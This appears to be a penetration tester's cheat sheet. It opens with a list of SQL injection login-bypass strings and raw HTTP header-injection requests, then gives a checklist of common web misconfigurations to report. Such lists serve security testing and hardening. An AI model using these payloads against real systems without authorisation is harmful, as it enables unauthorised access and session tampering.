' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #
GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n
POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
Easy Vulnerabilities & Security Misconfigurations to Report
Vulnerabilities that could be found in the early stages (first few hours) of a pentest.
Security Headers
Misconfigured Security Headers:
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Strict-Transport-Security
Content-Security-Policy (CSP)
Referrer-Policy
Cross-Origin Resource Sharing (CORS)
Insecure CORS Configuration:
Allowing wildcard (*) origin
Allowing untrusted origins
Lack of proper validation
Cookie Attributes
Insecure Cookie Attributes:
Missing HttpOnly flag
Missing Secure flag
Missing SameSite attribute
Authentication & Session Management
Concurrent Logins Allowed:
Multiple sessions from different IPs
Improper Session Timeout:
Long or no session expiration
Improper Invalidation of Cookie Post Logout:
Session remains active after logout
Weak Password Policies:
No complexity requirements
Lack of rate limiting
File Handling
Unrestricted File Upload:
No file type validation
No file size restrictions
No scanning for malware
Access Controls
Staging Environment Accessible from External Network:
Exposed internal environments
Sensitive Directories Accessible:
/.git/, /.svn/, /backup/, /config/
Web Server Configuration
Clickjacking:
Missing X-Frame-Options header
Weak SSL Ciphers:
Use of deprecated SSL/TLS versions
Weak cipher suites enabled
Web Server Fingerprinting:
Banner Grabbing revealing server information
Information Disclosure
Verbose Error Messages:
Detailed stack traces
Application/Server details in error messages
Directory Listing Enabled:
Ability to list files in web directories
Business Logic & Other Issues
Lack of Rate Limiting:
Brute force or DoS vulnerabilities
No Account Lockout:
Unlimited login attempts
Weak Default Credentials:
Use of default passwords for admin accounts
HTTP Methods:
TRACE/TRACK methods enabled
Referrer Policy:
No Referrer Policy header
API Security:
Lack of authentication
Lack of rate limiting
Exposed sensitive endpoints
Insecure Direct Object References (IDOR):
Direct access to unauthorized resources
Lack of Input Validation:
No sanitization of user input
Additional Points
Backup Files Accessible:
.bak, .old, .save files accessible
Exposed API Keys or Tokens:
API keys or tokens in URLs, JavaScript, etc.
Insufficient Logging and Monitoring:
Lack of logging for security events
Cross-Site Request Forgery (CSRF):
Missing or incorrect CSRF tokens
Insufficient Transport Layer Security:
HTTP instead of HTTPS
Autocomplete Enabled for Sensitive Fields:
Sensitive form fields have autocomplete enabled
Insecure Directories:
/admin/, /config/, /backup/ directories exposed
Insecure Third-Party Integrations:
Unpatched or outdated third-party libraries and frameworks